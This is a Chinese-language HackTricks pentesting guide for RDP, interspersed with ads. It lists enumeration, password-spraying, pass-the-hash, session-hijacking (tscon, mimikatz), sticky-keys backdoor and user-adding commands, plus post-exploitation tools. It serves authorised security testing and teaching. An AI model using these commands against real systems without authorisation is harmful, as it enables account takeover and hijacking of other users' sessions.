hacktricks/network-services-pentesting/pentesting-rdp.md

8.2 KiB
Raw Blame History

3389 - RDP渗透测试

从零开始学习AWS黑客攻击直到成为专家通过 htARTE (HackTricks AWS Red Team Expert)!

支持HackTricks的其他方式

即刻可用的漏洞评估和渗透测试设置。从任何地方运行完整的渗透测试拥有20多个从侦察到报告的工具和功能。我们不替代渗透测试人员 - 我们开发定制工具、检测和利用模块以便他们有更多时间深入挖掘、弹出shell并享受乐趣。

{% embed url="https://pentest-tools.com/" %}

基本信息

远程桌面协议(RDP)是微软开发的专有协议,它为用户提供了一个图形界面,以便通过网络连接连接到另一台计算机。用户为此目的使用RDP客户端软件,而另一台计算机必须运行RDP服务器软件(来自这里)。

默认端口: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

枚举

自动

{% code overflow="wrap" %}

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

{% endcode %}

它检查可用的加密和DoS漏洞不会对服务造成DoS并获取NTLM Windows信息版本

暴力破解

注意,你可能会锁定账户

密码喷射

注意,你可能会锁定账户

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

使用已知的凭据/哈希连接

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

检查已知凭据是否适用于RDP服务

impacket中的rdp_check.py允许您检查某些凭据是否对RDP服务有效

rdp_check <domain>/<name>:<password>@<IP>

即时可用的漏洞评估与渗透测试设置。在任何地方运行完整的渗透测试拥有20多种工具和功能从侦察到报告。我们不替代渗透测试人员 - 我们开发定制工具、检测和利用模块以便让他们有更多时间深入挖掘、弹出shell并享受乐趣。

{% embed url="https://pentest-tools.com/" %}

攻击

会话窃取

拥有SYSTEM权限,你可以访问任何用户打开的RDP会话,无需知道所有者的密码。

获取打开的会话:

query user

访问选定的会话

tscon <ID> /dest:<SESSIONNAME>

现在您将进入所选的RDP会话并且您将仅使用Windows工具和功能模拟用户。

重要当您访问活动的RDP会话时您将踢掉正在使用它的用户。

您可以通过转储进程来获取密码但这种方法更快并且可以让您与用户的虚拟桌面互动密码在记事本中未保存在磁盘上其他机器上打开的其他RDP会话...

Mimikatz

您也可以使用mimikatz来做到这一点

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

Sticky-keys & Utilman

将此技术与stickykeysutilman结合使用您将能够随时访问管理CMD和任何RDP会话。

您可以使用以下链接搜索已经用这些技术后门的RDPhttps://github.com/linuz/Sticky-Keys-Slayer

RDP 进程注入

如果其他域的某人或拥有更高权限的用户通过RDP登录到您是管理员的PC您可以在他的RDP会话进程注入您的信标,并以他的身份行动:

{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} rdp-sessions-abuse.md {% endcontent-ref %}

将用户添加到RDP组

net localgroup "Remote Desktop Users" UserLoginName /add

自动化工具

AutoRDPwn 是一个使用Powershell创建的后渗透框架主要设计用于自动化对Microsoft Windows计算机的Shadow攻击。这个漏洞被Microsoft列为一个特性允许远程攻击者在未经受害者同意的情况下查看其桌面,甚至在需要时使用操作系统本身的工具控制它。

  • EvilRDP
  • 从命令行自动控制鼠标和键盘
  • 从命令行自动控制剪贴板
  • 从客户端生成一个SOCKS代理通过RDP将网络通信引导至目标
  • 在目标上执行任意SHELL和PowerShell命令无需上传文件
  • 即使在目标上禁用了文件传输,也能上传和下载文件到/从目标

HackTricks 自动化命令

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software

https://book.hacktricks.xyz/pentesting/pentesting-rdp

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}

即刻可用的漏洞评估与渗透测试设置。在任何地方运行完整的渗透测试拥有20多个从侦察到报告的工具和功能。我们不替代渗透测试人员 - 我们开发定制工具、检测和利用模块以便让他们有更多时间深入挖掘、弹出shell并享受乐趣。

{% embed url="https://pentest-tools.com/" %}

从零开始学习AWS黑客技术成为英雄通过 htARTE (HackTricks AWS Red Team Expert)

其他支持HackTricks的方式